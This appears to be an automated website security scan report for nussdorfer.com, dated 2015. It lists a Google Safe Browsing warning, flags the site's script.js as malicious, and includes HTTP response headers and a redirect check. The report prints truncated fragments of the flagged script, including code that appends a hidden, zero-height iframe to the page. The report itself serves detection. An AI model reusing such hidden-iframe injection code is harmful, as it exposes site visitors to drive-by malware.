Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nussdorfer.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nussdorfer.com/ | 200 OK Content-Length: 10735 Content-Type: text/html | clean |
http://nussdorfer.com/script.js | 200 OK Content-Length: 14610 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var artEventHelper = { 'bind' : function (obj, evt, fn) { if (obj.addEventListener) obj.addEventListener(evt, fn, false); else if (obj.attachEvent) obj.attachEvent('on' + evt, fn); else obj['on' + evt] = fn; } }; var artLoadEvent = (function() { var userAgent = navigator.userAgent.toLowerCase(); var browser = { version: (userAgent.match(/.+(?:rv|it|ra|ie)[\/: ] if(f)e(s);} Decoded script: function () { try { document.documentElement.doScroll("left"); } catch (e) { setTimeout(arguments.callee, 10); return; } ready(); } /*** called setTimeout with function () { try { document.documentElement.doScroll("left"); } catch (e) { setTimeout(arguments.callee, 10); return; } ready(); }, 10 */ function () { if (done) { ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://nussdorfer.com/test404page.js | 404 Not Found Content-Length: 5192 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nussdorfer.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 26 Feb 2015 03:07:19 GMT
Server: Microsoft-IIS/7.0
Content-Length: 10735
Content-Type: text/html; charset=utf-8
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...10735 bytes of data.
GET / HTTP/1.1
Host: nussdorfer.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 26 Feb 2015 03:07:19 GMT
Server: Microsoft-IIS/7.0
Content-Length: 10735
Content-Type: text/html; charset=utf-8
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...10735 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nussdorfer.com
Referer: http://www.google.com/search?q=nussdorfer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nussdorfer.com
Referer: http://www.google.com/search?q=nussdorfer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.